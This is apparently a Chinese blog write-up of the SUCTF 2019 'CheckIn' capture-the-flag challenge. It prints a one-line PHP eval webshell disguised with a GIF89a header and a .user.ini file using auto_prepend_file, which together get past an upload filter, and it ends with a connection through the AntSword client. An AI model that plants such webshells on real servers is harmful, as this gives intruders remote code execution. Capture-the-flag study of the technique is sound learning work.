[SUCTF 2019]CheckIn 1

八块腹肌的橘猫2024-05-07 19:43

解题步骤

  1. 上传木马图片,命名为b.php
xml 复制代码 
GIF89a
<script language='php'>@eval($_POST['cmd'])</script>

  1. bp抓包,修改数据;然后可看到上传的文件

  2. 上传.user.ini文件,内容编写如下,然后bp抓包修改文件类型

php 复制代码 
GIF89a
auto_prepend_file=b.jpg


  1. 可发现,刚刚我们上传的木马b文件被删除了,这里我测试了几遍,只要速度够快,两个文件能够同时存在,能够用蚁剑连接。


相关推荐
安全渗透Hacker1 小时前
参数未校验导致的DOS(服务拒绝)问题典型场景
java·安全·web安全·网络安全·安全性测试
盛世宏博北京1 小时前
《可复制推广:智慧档案馆 “十防” 安全防护体系建设指南》
网络·人工智能·web安全·智慧档案
MOON404☾2 小时前
003.端口扫描
网络·安全·web安全·网络安全·系统安全
Bug.ink4 小时前
BUUCTF——WEB(8)
web安全·网络安全·buuctf
上海云盾-小余4 小时前
im即时通讯被攻击使用游戏盾高防方案有效解决
网络·网络协议·web安全·游戏·金融·ddos
扑火的小飞蛾13 小时前
网络安全小白学习路线图 (基于提供文档库)
学习·安全·web安全
计算机程序设计小李同学14 小时前
个人数据管理系统
java·vue.js·spring boot·后端·web安全
黄焖鸡能干四碗19 小时前
信息安全网络安全评估报告(WORD)
大数据·网络·人工智能·安全·web安全·制造·需求分析
m0_7381207219 小时前
应急响应——知攻善防靶场Linux-1详细应急过程
linux·运维·服务器·网络·web安全·ssh
白帽黑客-晨哥21 小时前
授权单位实战+专属应急队,湖南省网安基地如何用真实项目与应急响应锻造安全精英
web安全·网络安全·渗透测试·kali·湖南省网安基地
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)06【踩坑笔记】50系显卡适配的 PyTorch 安装07手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!08Opencode CLI 安装成功,但是启动失败09Claude Code Plan 模式完全指南:从入门到精通10UV安装并设置国内源